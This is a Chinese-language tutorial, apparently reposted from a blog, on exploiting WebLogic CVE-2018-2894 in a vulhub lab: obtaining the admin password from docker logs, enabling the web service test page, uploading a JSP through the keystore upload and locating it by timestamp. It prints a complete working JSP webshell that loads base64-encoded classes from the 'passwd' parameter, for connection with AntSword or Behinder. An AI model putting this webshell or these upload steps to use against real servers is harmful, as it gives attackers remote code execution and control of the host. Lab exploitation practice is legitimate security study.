任意文件上传漏洞CVE-2018-2894
漏洞描述
Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制,漏洞存在页面在/ws_utc/config.do。
漏洞影响版本
weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。
IP地址 http://192.168.xxx.xxx:7001/console //进入后台系统
用户账号密码获取
vulhub靶场默认账户是weblogic 密码查看一下logs就能找到了
在kali上执行 docker-compose logs | grep password
环境准备
进入高级配置
在此处一定要进行勾选启用web服务器测试页,勾选后下拉的最下方进行保存配置
路径: http://192.168.17.130:7001/ws_utc/config.do
当前的工作目录路径,配置完成后进行保存
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
但在此处是有坑的如果这里的配置这里最后有css,那么上传文件后,你的访问链接应该是
路径:http://localhost:7001/ws_utc/css/config/keystore/1637485345393_shell.jsp
如果没有添加/css 那么上传文件后你的链接应该是
路径:http://localhost:7001/ws_utc/config/keystore/1637485345393_shell.jsp
安全->添加->浏览
上传成功之后,查看返回的数据包,其中有时间戳
可以通过查看源代码的方式或者使用Burp抓包进行获取
获取权限
获取权限的路径 http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]
我们可以使用蚁剑或者冰蝎进行连接来获取权限
http://192.168.17.130:7001/ws_utc/css/config/keystore/1666276503565_shell.jsp
shell.jsp 文件 (jsp一句话木马)
【连接密码】: passwd
-
<%!
-
class U extends ClassLoader {
-
U(ClassLoader c) {
-
super(c);
-
}
-
public Class g(byte[] b) {
-
return super.defineClass(b, 0, b.length);
-
}
-
}
-
-
public byte[] base64Decode(String str) throws Exception {
-
try {
-
Class clazz = Class.forName("sun.misc.BASE64Decoder");
-
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
-
} catch (Exception e) {
-
Class clazz = Class.forName("java.util.Base64");
-
Object decoder = clazz.getMethod("getDecoder").invoke(null);
-
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
-
}
-
}
-
%>
-
<%
-
String cls = request.getParameter("passwd");
-
if (cls != null) {
-
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
-
}
-
%>
本篇文章来至:学新通
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通
- 本文地址: https://www.swvq.com/boutique/detail/tanhcjahgj
- 联系方式: luke.wu#vfv.cc
-
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
表格输入身份证号码后三位显示0怎么办
PHP中文网 06-21 -
photoshop默认安装在c盘怎么移动
PHP中文网 03-29 -
word表格分成了上下两块怎么办
PHP中文网 06-17 -
剪切蒙版和图层蒙版的区别是什么意思
PHP中文网 06-17 -
怎么文档的文字转换成4行5列的表格
PHP中文网 06-21 -
windows电脑提示已关闭无线功能怎么办
PHP中文网 06-24 -
微信小程序没声音怎么办
PHP中文网 06-15 -
excel表格进行段落设置
PHP中文网 06-23 -
怎么把照片尺寸改为192×144
PHP中文网 06-13